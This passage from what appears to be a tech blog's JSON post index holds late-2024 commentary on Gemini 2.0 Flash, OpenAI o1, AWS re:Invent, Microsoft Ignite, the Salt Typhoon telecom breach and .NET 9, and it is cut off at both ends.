entirely new in concept (function calling has been available in various models), but the integration depth is notable. Gemini 2.0 Flash can, in a single turn, search the web for current information, write and execute Python code to analyze the results, and generate a response that synthesizes everything.\nMultimodal output is another significant addition. Previous Gemini versions could understand images and audio as input, but Gemini 2.0 can also generate images and produce text-to-speech audio natively. This opens up use cases that previously required chaining multiple models together — a workflow that\u0026rsquo;s always been brittle and latency-heavy.\nPerformance-wise, Google claims Gemini 2.0 Flash outperforms the previous generation\u0026rsquo;s Pro model on key benchmarks while maintaining Flash\u0026rsquo;s characteristic speed and cost efficiency. If that holds up in practice, it\u0026rsquo;s remarkable — getting Pro-level quality at Flash-level pricing and latency would make it extremely competitive for production API use cases.\nThe \u0026ldquo;Flash\u0026rdquo; Philosophy # I appreciate Google\u0026rsquo;s approach with the Flash tier. While the industry tends to focus on the biggest, most capable models, the reality for most production applications is that you need something fast, reliable, and affordable. Running GPT-4o or Claude Sonnet on every API call gets expensive at scale. Flash models — whether Google\u0026rsquo;s Gemini Flash or similar offerings — address the sweet spot where you need more capability than a basic model but can\u0026rsquo;t justify the latency and cost of the top tier.\nIn my experience building AI-powered features for production systems, the model you actually ship with is almost never the most capable one available. It\u0026rsquo;s the one that gives you acceptable quality within your latency and cost budgets. Comparing against foundation models like Claude with advanced capabilities, Gemini 2.0 Flash exemplifies Google\u0026rsquo;s competitive strategy. Pushing Pro-level quality into the Flash tier is exactly the kind of improvement that changes production deployment decisions.\nAgentic AI: The Common Thread # It\u0026rsquo;s impossible to miss that every major AI company is converging on the same narrative: agents. Microsoft announced Copilot agents at Ignite. OpenAI is building tool use deeper into their models. And now Google is positioning Gemini 2.0 as fundamentally designed for agentic workflows.\nGoogle showcased several prototype agents built on Gemini 2.0: Project Astra (a universal AI assistant that can see and understand the world through your phone\u0026rsquo;s camera), Project Mariner (a Chrome extension that can browse the web and take actions on your behalf), and Jules (a coding agent that integrates with GitHub to handle pull requests and bug fixes).\nJules is particularly interesting for developers. The idea of an AI that can autonomously work through your GitHub issues, create branches, write code, and submit PRs is compelling — and slightly terrifying. I\u0026rsquo;ve seen enough auto-generated code to know that rigorous testing and review remains critical. But as a tool for handling mechanical tasks like dependency updates, boilerplate generation, or straightforward bug fixes, it could save real time.\nThe Developer Experience Gap # Where Google still needs to improve is the developer experience around its AI platform. The Gemini API has evolved significantly, but it still feels less polished than OpenAI\u0026rsquo;s offering. Documentation can be inconsistent, pricing isn\u0026rsquo;t always transparent, and the proliferation of Google AI products (Vertex AI, Google AI Studio, Firebase ML) creates confusion about which platform to use for what.\nThat said, Google AI Studio has gotten markedly better for prototyping. If you haven\u0026rsquo;t tried it recently, it\u0026rsquo;s worth another look. The ability to test prompts against Gemini 2.0 with real-time streaming, upload files for multimodal analysis, and export code snippets is genuinely useful for rapid experimentation.\nThe Vertex AI integration matters for enterprise teams who need the full MLOps stack — model management, monitoring, A/B testing, and compliance controls. Google\u0026rsquo;s challenge is making the path from \u0026ldquo;I tried this in AI Studio\u0026rdquo; to \u0026ldquo;this is running in Vertex AI in production\u0026rdquo; as smooth as possible.\nMy Take # Gemini 2.0 Flash is the most significant Google AI release since the original Gemini launch. The combination of improved quality, native tool use, and multimodal output at Flash-tier pricing makes it a serious contender for production AI workloads. For developers who\u0026rsquo;ve been defaulting to OpenAI\u0026rsquo;s API, this is worth evaluating — especially if your use cases benefit from Google Search integration or multimodal capabilities. The landscape of AI providers continues to diversify, giving teams real choice.\nThe broader picture is even more interesting. We now have three major AI platforms (OpenAI, Google, Anthropic) all pushing hard on agentic capabilities, each with different strengths. OpenAI leads in reasoning with o1, Google leads in multimodal and search integration, and Anthropic leads in safety and reliability. This competition is driving rapid improvement, and developers who stay flexible — avoiding tight coupling to any single provider — will be best positioned to take advantage of it.\nThe next few months are going to be fascinating. I suspect we\u0026rsquo;ll look back at December 2024 as the month the AI industry shifted from \u0026ldquo;better chatbots\u0026rdquo; to \u0026ldquo;autonomous agents\u0026rdquo; as the primary paradigm. Whether that\u0026rsquo;s premature remains to be seen, but the direction is clear.\n","date":"12 December 2024","externalUrl":null,"permalink":"/posts/241212-google-gemini-2-flash/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s Gemini 2.0 Flash brings native tool use, multimodal output, and agentic capabilities. A look at what this means for the competitive AI landscape.","title":"Google Launches Gemini 2.0 Flash — The Multi-Modal AI Race Accelerates","type":"posts"},{"content":"OpenAI launched its \u0026ldquo;12 Days of OpenAI\u0026rdquo; livestream event today, and day one came out swinging. The full o1 model is now generally available to ChatGPT Plus and Team subscribers, and there\u0026rsquo;s a brand new ChatGPT Pro subscription tier at $200 per month. After months of the o1-preview, we finally get the real thing — and it\u0026rsquo;s a notable step forward in how AI models handle complex reasoning tasks.\nWhat Makes o1 Different # The o1 model family represents a fundamental architectural shift from the GPT-4 lineage. Rather than generating tokens in a straightforward autoregressive manner, o1 uses a \u0026ldquo;chain of thought\u0026rdquo; reasoning process that mirrors advances in other reasoning models — it effectively thinks before it responds, spending additional compute time working through problems step by step before producing its final answer. This contrasts with context-length optimization approaches and broader LLM development paradigms that focus on different dimensions of model capability.\nIn practice, this means o1 excels at tasks that require multi-step logical reasoning: mathematics, coding problems that involve complex logic, scientific analysis, and strategic planning. OpenAI reports significant improvements over GPT-4o on benchmarks like AIME (American Invitational Mathematics Examination), GPQA (graduate-level science questions), and competitive programming challenges.\nI\u0026rsquo;ve been testing o1-preview for several weeks in my own workflow, particularly for code review and architectural analysis. The difference is most apparent when you give it a complex codebase question — something like \u0026ldquo;analyze this authentication flow and identify potential race conditions.\u0026rdquo; Where GPT-4o would sometimes give superficial answers, o1-preview consistently produced more thorough, structured analysis. This mirrors advancements in AI-assisted code analysis and agentic workflows. The full o1 model reportedly improves on this further, with better factual accuracy and more coherent long-form reasoning.\nChatGPT Pro at $200/Month # The new Pro tier gives subscribers access to \u0026ldquo;o1 pro mode,\u0026rdquo; which uses even more compute per query for the most challenging tasks. OpenAI describes it as delivering more reliable and thorough answers on hard problems in math, science, and programming. You also get unlimited access to o1, GPT-4o, and Advanced Voice Mode.\nTwo hundred dollars a month is steep for an individual, but for a professional developer or researcher, the math can work out. If o1 pro mode saves you even a few hours per month of debugging or analysis time, it pays for itself. That said, the value proposition depends entirely on whether the \u0026ldquo;pro mode\u0026rdquo; delivers meaningfully better results than standard o1 for your specific use cases. I\u0026rsquo;d want to see concrete comparisons before committing.\nThe pricing signal is interesting from a broader perspective. It suggests that OpenAI\u0026rsquo;s most capable models are genuinely expensive to run — the compute cost of extended reasoning chains adds up. This connects to broader AI infrastructure costs and compute moat dynamics. This has implications for API pricing too. Developers building applications on top of o1 via the API need to think carefully about cost management, because a model that \u0026ldquo;thinks longer\u0026rdquo; on complex queries will cost more per request than a straightforward GPT-4o call.\nImplications for Developer Workflows # For those of us who build software, o1 opens up some new possibilities. Code generation is the obvious one, but I think the more impactful use cases are in code understanding and analysis. Large codebases are notoriously difficult to reason about — understanding the implications of a change across multiple services, identifying subtle bugs that arise from interaction patterns, or evaluating whether a proposed architecture will scale. These are tasks that benefit from the kind of systematic reasoning that o1 is designed for.\nI can also see o1 becoming valuable in incident response. When you\u0026rsquo;re debugging a production issue at 2 AM and trying to correlate logs across multiple services, having a model that can methodically work through hypotheses rather than pattern-matching to the most likely answer could be genuinely useful.\nThe developer experience around these models still needs work, though. Latency is the main concern — o1\u0026rsquo;s reasoning process means responses take longer, sometimes significantly longer. For interactive coding assistance where you want quick completions, GPT-4o is still the better choice. O1 is more suited to \u0026ldquo;background analysis\u0026rdquo; tasks where you can afford to wait 30 seconds or more for a thorough answer.\nThe \u0026ldquo;12 Days\u0026rdquo; Strategy # OpenAI\u0026rsquo;s decision to stretch their announcements across twelve days of livestreams is a savvy marketing move. It keeps them in the news cycle continuously and builds anticipation. But it also reflects the reality that they have a lot to announce — rumored upcoming reveals include updates to Sora (their video generation model), new API capabilities, and potentially more model releases.\nThe competitive landscape is heating up. Google is expected to announce Gemini 2.0 soon, Anthropic has been steadily improving Claude, and open-source models from Meta and Mistral keep closing the gap. OpenAI maintaining its perceived lead requires a constant drumbeat of improvements, and this event is clearly designed to reinforce their position.\nMy Take # The full o1 release is the most significant development in AI tooling since GPT-4\u0026rsquo;s launch. Not because it\u0026rsquo;s the most capable model on every task — it isn\u0026rsquo;t, and GPT-4o remains better for many common use cases — but because it demonstrates a viable path for improving AI capabilities beyond simply scaling training data and parameters. The idea that you can improve output quality by giving a model more inference-time compute to \u0026ldquo;think\u0026rdquo; is powerful, and I expect this approach to become standard across the industry.\nFor developers, my practical advice is: try o1 for your hardest reasoning tasks. Don\u0026rsquo;t use it for everything — it\u0026rsquo;s slower and more expensive — but identify the places in your workflow where you need deeper analysis, and test whether o1 delivers. The results might surprise you.\nThe next eleven days of announcements should be interesting. I\u0026rsquo;ll be following along and will cover anything that\u0026rsquo;s relevant for our work as developers.\n","date":"5 December 2024","externalUrl":null,"permalink":"/posts/241205-openai-o1-full-model-chatgpt-pro/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI kicks off its ‘12 Days of OpenAI’ event with the full o1 reasoning model and a new $200/month ChatGPT Pro tier. What this means for developers building with AI.","title":"OpenAI Launches o1 Full Model and $200/Month ChatGPT Pro — The Reasoning Era Begins","type":"posts"},{"content":"It\u0026rsquo;s re:Invent week in Las Vegas, and AWS is doing what it does best — overwhelming the industry with a firehose of announcements. I\u0026rsquo;m following along remotely this year, and even from a distance, the energy is palpable. After thirty years in this industry, I\u0026rsquo;ve learned that re:Invent keynotes are roughly 40% substance and 60% marketing theater, but the substance this year is genuinely compelling.\nTrainium2 and the Custom Silicon Arms Race # The biggest infrastructure story is the general availability of Trainium2-powered instances. AWS has been building custom chips for years — Graviton for general compute, Inferentia for inference — but Trainium2 represents their most ambitious play yet in the AI training space. Amazon claims a 4x improvement in training performance over the first-generation Trainium, with the ability to scale to 100,000-chip UltraClusters.\nThis is directly aimed at NVIDIA\u0026rsquo;s dominance. While AWS still offers GPU instances (and plenty of them), the economics of running training workloads on custom silicon at cloud-provider scale could be transformative. If you\u0026rsquo;re an organization spending seven or eight figures on model training, even a 20-30% cost reduction is enormous. The question is whether the software ecosystem — frameworks, compilers, debugging tools — can match what NVIDIA offers with CUDA. That\u0026rsquo;s historically been the stumbling block for alternative AI accelerators. This challenge mirrors broader AI infrastructure standardization efforts and cloud cost optimization concerns.\nMatt Garman\u0026rsquo;s keynote emphasized that Amazon internally is using Trainium2 extensively for training its own models, which is both a vote of confidence and a practical necessity — they need to prove the platform works at scale before enterprise customers will trust it with their critical workloads.\nAurora DSQL: Serverless Distributed SQL # On the database front, Aurora DSQL caught my eye. It\u0026rsquo;s a new serverless, distributed SQL database that promises PostgreSQL compatibility with virtually unlimited scalability and 99.99% multi-Region availability. AWS describes it as offering \u0026ldquo;the speed of active-active with the consistency of active-passive.\u0026rdquo;\nIf you\u0026rsquo;ve spent any time wrestling with distributed databases — and I\u0026rsquo;ve spent more than I care to remember — you know that\u0026rsquo;s a bold claim. The CAP theorem doesn\u0026rsquo;t disappear just because you\u0026rsquo;re AWS. These fundamental tradeoffs persist in infrastructure architecture decisions. But the architecture appears interesting: they\u0026rsquo;ve separated compute, storage, and transaction management into independent layers, each scaling independently.\nThe PostgreSQL compatibility is key. For teams already running on Aurora PostgreSQL, the migration path should be manageable. For greenfield projects that need global distribution without the operational complexity of CockroachDB or Spanner, this could be compelling. I\u0026rsquo;ll be watching for real-world benchmarks and latency numbers as early adopters start testing it.\nAmazon Nova: Foundation Models In-House # Amazon also launched Amazon Nova, a family of foundation models available through Bedrock. The lineup includes Nova Micro (text-only, optimized for speed and cost), Nova Lite (multimodal), and Nova Pro (the most capable, balancing accuracy and speed). Amazon is positioning these as cost-effective alternatives to models from Anthropic, Meta, and others available on Bedrock.\nThe strategic logic is clear: AWS doesn\u0026rsquo;t want to be purely a model-hosting platform. By offering competitive first-party models, they can capture more of the AI value chain and reduce dependency on third-party model providers. It\u0026rsquo;s the same playbook they\u0026rsquo;ve run with databases, networking, and virtually every other infrastructure category — start by hosting others\u0026rsquo; solutions, then build your own.\nFrom a developer perspective, the interesting aspect is the unified Bedrock API. Whether you\u0026rsquo;re using Nova, Claude, or Llama, the interface is consistent. This approach mirrors multi-runtime compatibility we\u0026rsquo;re seeing elsewhere. This makes it practical to benchmark different models against each other for specific use cases and switch with minimal code changes. That\u0026rsquo;s the kind of flexibility that matters in a rapidly evolving landscape.\nDevOps and Developer Tooling Updates # Beyond the headline grabbers, several smaller announcements matter for day-to-day development work. AWS CloudFormation now supports importing existing resources more seamlessly, addressing one of the longest-standing pain points in infrastructure-as-code adoption. If you\u0026rsquo;ve ever had to write a CloudFormation template around resources that were created manually in the console — and who hasn\u0026rsquo;t — this is welcome.\nAmazon Q Developer, their AI coding assistant, received significant updates including the ability to perform autonomous code transformations. Point it at a Java 8 application and it can migrate it to Java 17, handling dependency updates and test validation. I\u0026rsquo;m skeptical of fully autonomous code migrations, but as an assistant that handles the mechanical parts while a developer reviews, it could save significant time.\nMy Take # Re:Invent 2024 feels like AWS acknowledging that the cloud landscape has shifted. Five years ago, the focus was on breadth of services. Now, it\u0026rsquo;s about depth in AI infrastructure and reducing the total cost of AI workloads. The custom silicon strategy is a long-term bet that could fundamentally change the economics of AI if the software ecosystem matures.\nFor DevOps teams, the practical advice is to evaluate Aurora DSQL if you have global distribution requirements, and keep an eye on Trainium2 instance pricing for training workloads. These infrastructure investments align with platform engineering and observability maturity. The cost savings could be substantial, but validate that your frameworks are fully supported before committing.\nComing right after Microsoft Ignite, the contrast is interesting: Microsoft leads with Copilot and agents, AWS leads with infrastructure and cost optimization. Both are valid strategies, and the competition is driving rapid innovation. As engineers, we\u0026rsquo;re in a good position — the tools keep getting better, and the choices keep multiplying.\n","date":"28 November 2024","externalUrl":null,"permalink":"/posts/241128-aws-reinvent-2024-highlights/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2024 opens with major announcements around Trainium2 chips, Aurora DSQL, and Amazon’s own Nova AI models. Here’s what’s worth paying attention to.","title":"AWS re:Invent 2024 — Amazon Bets Big on Custom Silicon and AI Infrastructure","type":"posts"},{"content":"Microsoft Ignite kicked off this week in Chicago, and if the sheer volume of announcements is any indicator, Redmond is going all-in on making Azure the default platform for AI workloads. Having attended Ignite in various forms over the years — from the old TechEd days to the pandemic-era virtual events — I can say this year\u0026rsquo;s edition felt like a genuine inflection point. The messaging was clear: everything is AI-first now.\nAzure AI Foundry: A Unified Platform Play # The headline announcement that caught my attention was Azure AI Foundry, essentially a rebranding and consolidation of Azure AI Studio into a more comprehensive platform. Microsoft is positioning it as the single place where developers can build, test, and deploy AI applications — bringing together model catalog access, prompt engineering tools, evaluation frameworks, and deployment pipelines.\nWhat\u0026rsquo;s interesting here isn\u0026rsquo;t just the product itself, but the strategic intent. By unifying these capabilities, Microsoft is trying to reduce the friction that enterprise teams face when moving from experimentation to production. I\u0026rsquo;ve seen this pattern play out in my own consulting work — teams build impressive prototypes in notebooks but struggle to operationalize them. If Foundry delivers on its promise, it could meaningfully shorten that gap.\nThe model catalog now includes models from Meta, Mistral, and Cohere alongside OpenAI\u0026rsquo;s offerings. This multi-model approach is smart, mirroring Microsoft\u0026rsquo;s broader AI platform strategy announced earlier in the year. Lock-in anxiety is real, and giving teams the ability to swap models without rewriting their orchestration layer is a strong value proposition.\nCopilot Actions and the Agent Era # Microsoft also unveiled Copilot Actions — essentially the ability to create automated workflows triggered by natural language prompts within the Microsoft 365 ecosystem. Think of it as Power Automate, but with Copilot as the interface layer. You can set up recurring tasks like \u0026ldquo;summarize my unread emails every morning\u0026rdquo; or \u0026ldquo;draft a weekly status report from my Teams conversations.\u0026rdquo;\nI\u0026rsquo;m cautiously optimistic about this. The concept of AI agents that can take actions on your behalf is compelling, but the devil is in the details. Permission models, data governance, and audit trails become critical when an AI is performing actions in your corporate environment. These governance concerns mirror broader AI regulatory requirements becoming increasingly important across the industry. Microsoft seems to be aware of this — they emphasized built-in governance controls — but I\u0026rsquo;ll reserve judgment until I see how it works in practice.\nThe broader \u0026ldquo;agent\u0026rdquo; narrative was everywhere at Ignite. Azure AI Agent Service, Copilot Studio with autonomous agent capabilities, even SharePoint agents. It feels like Microsoft is betting that the next phase of AI adoption isn\u0026rsquo;t just chat interfaces but semi-autonomous processes. That aligns with what I\u0026rsquo;m hearing from enterprise architects: chatbots are nice, but what they really want is AI that can handle repetitive workflows end-to-end.\nInfrastructure Upgrades Under the Hood # Beneath the AI glitz, there were meaningful infrastructure announcements. Azure Cobalt 100 VMs are now generally available — these are Arm-based VMs that Microsoft claims offer up to 50% better price-performance for general-purpose workloads compared to their x86 counterparts. The Arm push in the cloud continues, and for teams running containerized microservices, the migration path is increasingly straightforward.\nAzure Local (the evolution of Azure Stack HCI) also got significant updates, emphasizing hybrid scenarios where organizations need to run Azure services on-premises. With the new Azure Managed Redis offering and improvements to Azure Kubernetes Service on Azure Local, Microsoft is making the hybrid story more coherent. For organizations in regulated industries that can\u0026rsquo;t move everything to the public cloud, this matters.\nOn the security front, Windows Resiliency Initiative was announced in the wake of the CrowdStrike incident earlier this year. Microsoft is introducing Quick Machine Recovery, allowing IT administrators to remotely fix machines that can\u0026rsquo;t boot — addressing exactly the scenario that grounded airlines and disrupted hospitals in July. Better late than never, I suppose, though one could argue these capabilities should have existed years ago.\nMy Take # What strikes me about Ignite 2024 is the coherence of the message. Previous years sometimes felt like a grab bag of announcements across different product groups. This year, there\u0026rsquo;s a clear thread: Azure is the AI platform, Copilot is the interface, and agents are the future of productivity.\nThe risk, of course, is that Microsoft is moving so fast that quality suffers. I\u0026rsquo;ve already heard grumbles from developers about Copilot\u0026rsquo;s reliability in certain IDEs, and the agent capabilities are still early. But the investment is undeniable — Satya Nadella mentioned during the keynote that Microsoft\u0026rsquo;s capital expenditure this fiscal year will exceed $50 billion, primarily for AI infrastructure.\nFor those of us building on Azure, the practical takeaway is to start exploring Azure AI Foundry and understand the agent programming model. Whether or not you\u0026rsquo;re ready to deploy AI agents in production, the platform is clearly being optimized for that pattern, and staying ahead of the curve is worth the investment in learning.\nThe cloud AI race is intensifying between Microsoft, Amazon, and Google, with each platform differentiating on security, AI capabilities, and infrastructure investment. We\u0026rsquo;re all benefiting from this competition.\n","date":"21 November 2024","externalUrl":null,"permalink":"/posts/241121-microsoft-ignite-2024-azure-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Ignite 2024 delivered a wave of Azure AI announcements — from Copilot Actions to Azure AI Foundry. Here’s what matters for developers and architects.","title":"Microsoft Ignite 2024 — Azure AI and Copilot Take Center Stage","type":"posts"},{"content":"This week, the scope of the Salt Typhoon cyberattack has become disturbingly clear. Multiple major US telecom providers — including AT\u0026amp;T, Verizon, T-Mobile, and Lumen Technologies — have confirmed breaches attributed to a Chinese state-sponsored hacking group. The attackers reportedly had access to call metadata, and in some cases actual communications, for months before detection. Federal investigations are ongoing, and the full extent of the compromise is still being assessed.\nThis isn\u0026rsquo;t your average data breach. This is a systematic penetration of the communications infrastructure that underpins American society. And it raises questions that every engineer building or maintaining critical systems needs to grapple with.\nWhat We Know So Far # Salt Typhoon (also tracked as GhostEmperor and FamousSparrow by different security firms) is a Chinese advanced persistent threat (APT) group that has been operating since at least 2020. The campaign connects to broader government infrastructure breaches and represents part of a larger pattern of sophisticated nation-state cyber operations. According to reporting from the Wall Street Journal and statements from CISA and the FBI, the group exploited vulnerabilities in telecom network infrastructure to gain persistent access.\nThe attack targeted systems used to comply with lawful intercept requirements — the CALEA (Communications Assistance for Law Enforcement Act) infrastructure that telecom providers are legally required to maintain. The cruel irony here is that backdoors built into telecom systems for lawful surveillance purposes became the attack vector for foreign espionage.\nThe metadata accessed reportedly includes call records: who called whom, when, for how long, and from where. For targeted individuals — reportedly including people involved in political campaigns — the access may have extended to actual call content and text messages.\nThe CALEA Paradox # For those of us who have followed the encryption and surveillance debates over the decades, Salt Typhoon is the nightmare scenario that security researchers have been warning about for years. This echoes concerns raised about critical infrastructure vulnerabilities where perimeter systems become the weak link.\nThe argument for lawful intercept capabilities has always been: we need these access points for legitimate law enforcement purposes, and we can secure them adequately. The counterargument has always been: any intentional weakness in a system can be exploited by unintended actors. You cannot build a backdoor that only the good guys can use.\nSalt Typhoon just proved the counterargument correct at a scale that\u0026rsquo;s hard to ignore. The very infrastructure built to enable authorized surveillance became the entry point for unauthorized surveillance by a foreign government.\nThis isn\u0026rsquo;t theoretical anymore. The next time someone proposes mandating encryption backdoors or expanding lawful intercept requirements, Salt Typhoon should be exhibit A for why that approach is fundamentally flawed. Security is not divisible — you cannot weaken a system for one purpose without weakening it for all purposes.\nWhat This Means for Engineering Teams # Even if you\u0026rsquo;re not building telecom infrastructure, there are concrete lessons here:\nAudit your compliance-mandated access points. If regulations require you to maintain monitoring, logging, or access capabilities, those are attack surfaces. Treat them with the same rigor you\u0026rsquo;d apply to any external-facing service. Segment them. Monitor them. Test them.\nPersistent access is the real threat. Salt Typhoon reportedly maintained access for months. The initial breach matters less than the dwell time. Invest in detection capabilities that can identify anomalous access patterns over long time horizons, not just perimeter defenses.\nSupply chain and infrastructure trust. Telecom infrastructure involves a complex web of vendors, protocols, and legacy systems. Many of the components in telecom networks were designed decades ago with different threat models. Implementing supply chain security standards like SLSA across infrastructure dependencies can help mitigate these risks. If you\u0026rsquo;re integrating with or depending on infrastructure you don\u0026rsquo;t fully control, you need to account for the possibility that it\u0026rsquo;s compromised.\nMetadata is not \u0026ldquo;just metadata.\u0026rdquo; There\u0026rsquo;s a persistent myth that metadata — who communicated with whom, when, and where — is somehow less sensitive than content. Intelligence agencies know better. Metadata at scale reveals patterns, relationships, movements, and intentions. If your systems generate or store metadata, protect it accordingly.\nThe Geopolitical Dimension # Salt Typhoon exists in the context of an escalating cyber conflict between nation-states. The US has attributed similar campaigns to Chinese groups (Volt Typhoon targeting critical infrastructure, APT41 targeting a wide range of sectors) with increasing frequency. China denies involvement, as it always does.\nWhat\u0026rsquo;s changed is the target selection. Previous campaigns focused on intellectual property theft or espionage against government agencies. Targeting telecom infrastructure — the backbone of civilian communication — represents an escalation. It\u0026rsquo;s the kind of capability you develop not just for intelligence gathering, but for potential disruption during a conflict.\nFor those of us in the tech industry, this is a reminder that cybersecurity isn\u0026rsquo;t just a technical problem. It\u0026rsquo;s a geopolitical reality that shapes the risk landscape for every system we build and operate.\nThe Response So Far # CISA and the FBI have issued advisories. Congress is holding briefings. The telecom companies are working with investigators. But the structural problem — that US telecom infrastructure is a patchwork of legacy and modern systems with mandated access points — isn\u0026rsquo;t going to be solved by any single response.\nSenator Ron Wyden has already called for investigations into why CALEA systems were so vulnerable. The FCC is reportedly considering new cybersecurity requirements for telecom providers. These are steps in the right direction, but they\u0026rsquo;re also years overdue.\nMy Take # In thirty years of working in technology, I\u0026rsquo;ve watched the security landscape evolve from script kiddies and worms to nation-state operations targeting critical infrastructure. Salt Typhoon represents a maturation of offensive cyber capabilities that should make every infrastructure engineer uncomfortable.\nThe hardest lesson here is that our regulatory frameworks can create security vulnerabilities. Laws written with good intentions — enabling lawful surveillance — created the exact weakness that adversaries exploited. This should make us deeply skeptical of any proposal that intentionally weakens system security, regardless of the justification.\nFor those of us building systems today, the practical takeaway is to assume that any mandated access point, any monitoring capability, any administrative interface is a target. Design accordingly. Monitor accordingly. And push back — through appropriate channels — when regulations demand architectural decisions that compromise security.\nThe telecom industry is learning this lesson the hard way. Let\u0026rsquo;s make sure the rest of us learn it from their experience rather than our own.\nThis is part of my Security in Practice series, examining real-world security events and their implications for software engineering.\n","date":"14 November 2024","externalUrl":null,"permalink":"/posts/241114-salt-typhoon-telecom-breach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Salt Typhoon campaign has compromised major US telecom providers, exposing the fragility of critical infrastructure and the growing sophistication of state-sponsored cyber operations.","title":"Salt Typhoon and the Telecom Breach — Infrastructure Under Siege","type":"posts"},{"content":".NET Conf 2024 kicked off this week, and with it comes the official release of .NET 9. After tracking this platform\u0026rsquo;s evolution since the early days of the original .NET Framework, I can say with some authority that the trajectory over the past few years has been remarkable. .NET 9 isn\u0026rsquo;t a revolution — it\u0026rsquo;s a refinement — but the cumulative effect of consistent, high-quality releases has made .NET one of the most compelling platforms for building modern software.\nLet me dig into what matters and what it means for those of us building production systems.\nPerformance: The Gift That Keeps Giving # Every .NET release brings performance improvements, and at some point you\u0026rsquo;d expect diminishing returns. .NET 9 says otherwise. The runtime team has delivered measurable gains across the board, with particular focus on areas that matter for cloud-native workloads.\nThe JIT compiler continues to get smarter. Dynamic PGO (Profile-Guided Optimization), which was introduced in earlier releases, has been further refined. The compiler now makes better decisions about inlining, loop optimization, and vectorization based on actual runtime behavior. In practice, this means applications that have been running for a while get progressively faster as the JIT identifies hot paths.\nServer GC has received significant attention. For containerized workloads — which is how most of us deploy these days — the garbage collector is better at understanding memory pressure signals from the container runtime. This translates to fewer OOM kills and more predictable latency under load.\nThe numbers from the TechEmpower benchmarks continue to be impressive. ASP.NET Core has been trading top positions with Rust and C++ frameworks, which is extraordinary for a garbage-collected runtime. For most teams, the performance delta between .NET and systems languages is no longer a valid reason to choose the harder path.\nCloud-Native First # The Aspire stack, introduced as a preview in .NET 8, reaches a more mature state with .NET 9. For those unfamiliar, .NET Aspire is an opinionated framework for building observable, production-ready distributed applications. It handles service discovery, health checks, telemetry, and configuration in a way that feels integrated rather than bolted on. This aligns with broader platform maturity and observability evolution.\nWhat I appreciate about Aspire\u0026rsquo;s approach is that it doesn\u0026rsquo;t try to hide the complexity of distributed systems — it just removes the boilerplate. You still need to understand service communication patterns, resilience strategies, and observability. But you don\u0026rsquo;t need to wire up OpenTelemetry exporters, configure health check endpoints, or write service discovery logic from scratch. Similar pragmatic approaches are evident in JavaScript runtime ecosystems and Rust\u0026rsquo;s foundational improvements.\nThe integration with Azure Container Apps and Kubernetes has deepened. The aspire manifest tooling can generate deployment artifacts that map cleanly to container orchestration platforms. Understanding cloud infrastructure choices and infrastructure-as-code approaches matters for deployment decisions. It\u0026rsquo;s not lock-in — the generated manifests are standard Kubernetes YAML or Bicep templates — but it does make the Azure path smooth enough that teams will gravitate toward it.\nC# 13: Measured Progress # C# 13 ships with .NET 9, and the language team continues their philosophy of incremental, well-considered additions rather than feature bloat. The headline features include:\nparams collections: The params keyword now works with any collection type, not just arrays. This is a small change that eliminates a surprising number of allocation-heavy patterns in everyday code.\nNew Lock type: A purpose-built System.Threading.Lock type that\u0026rsquo;s more efficient than locking on arbitrary objects. This is the kind of change that reflects maturity — fixing a decades-old pattern that everyone knew was suboptimal but nobody had a clean replacement for.\nfield keyword in properties: Semi-auto properties that let you access the backing field directly. This eliminates a whole category of \u0026ldquo;I need a full property just to add one line of validation\u0026rdquo; situations.\nNone of these are flashy. All of them reduce friction in daily development. That\u0026rsquo;s exactly what a mature language should be doing.\nThe Broader .NET Story # Stepping back from the specific release, what strikes me is how effectively Microsoft has executed the .NET transformation over the past eight years. The journey from .NET Framework (Windows-only, closed-source, stagnant) to modern .NET (cross-platform, open-source, cutting-edge performance) is one of the most successful platform reinventions in software history.\nThe developer experience gap with other ecosystems has largely closed. Hot reload works well. The CLI tooling is excellent. The package ecosystem (NuGet) is mature. IDE support spans VS Code, Visual Studio, and JetBrains Rider. You can develop on Mac or Linux without feeling like a second-class citizen.\nWhat still needs work is perception. In many tech circles, .NET still carries the baggage of its Windows-only, enterprise-only past. I regularly meet developers who dismissed .NET years ago and haven\u0026rsquo;t looked back. If that\u0026rsquo;s you, it\u0026rsquo;s worth another look — just as the runtime competition between languages like Deno has intensified, driving innovation across all platforms. The platform in 2024 bears little resemblance to the one you left.\nMy Take # I\u0026rsquo;ve been working across multiple language ecosystems throughout my career, and I use whatever tool fits the job. The focus on systems-level performance improvements is evident across the platform ecosystem, and .NET is no exception. But I have to give credit where it\u0026rsquo;s due: the .NET team has been executing at an exceptionally high level. The annual release cadence, the commitment to performance, and the willingness to make breaking changes when necessary (the Framework-to-Core transition) have all paid off. Tooling integration with AI-powered development environments is becoming increasingly important for developer adoption.\n.NET 9 specifically is a strong release for cloud-native development. If you\u0026rsquo;re building microservices, APIs, or background processing systems, the combination of performance, observability (through Aspire), and deployment tooling is hard to beat. The Aspire framework in particular deserves more attention from the broader developer community.\nThe one area where I\u0026rsquo;d push Microsoft is the AI story. Every platform is racing to integrate AI capabilities, and while .NET has Semantic Kernel and various Azure AI integrations, the developer experience for building AI-powered features still feels more natural in Python. With .NET 9 laying a solid foundation, I\u0026rsquo;m hoping .NET 10 makes AI development a first-class experience.\nFor now, if you\u0026rsquo;re already in the .NET ecosystem, upgrade and enjoy the improvements. If you\u0026rsquo;re not, .NET 9 is as good a time as any to take a fresh look.\nThis is part of my Developer Landscape series, tracking the trends and shifts that shape how we build software.\n","date":"7 November 2024","externalUrl":null,"permalink":"/posts/241107-dotnet-9-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft ships .NET 9 at .NET Conf 2024, delivering significant performance improvements and deeper cloud-native integration that solidify its position as a top-tier platform.","title":".NET 9 Arrives — Performance, Cloud-Native, and the Maturing Ecosystem","type":"posts"},{"content":"Happy Halloween. And if you work at Google, this might actually be scary: OpenAI officially launched ChatGPT Search this week, integrating live web search results directly into ChatGPT\u0026rsquo;s conversational interface. It\u0026rsquo;s available to Plus and Team subscribers now, with plans to roll out to free users eventually. After months of rumors and the earlier SearchGPT prototype, the feature is real and it\u0026rsquo;s polished enough to be genuinely useful.\nI\u0026rsquo;ve spent the past few days using it as my primary search tool for technical queries, and I have thoughts.\nHow It Works # ChatGPT Search isn\u0026rsquo;t just a 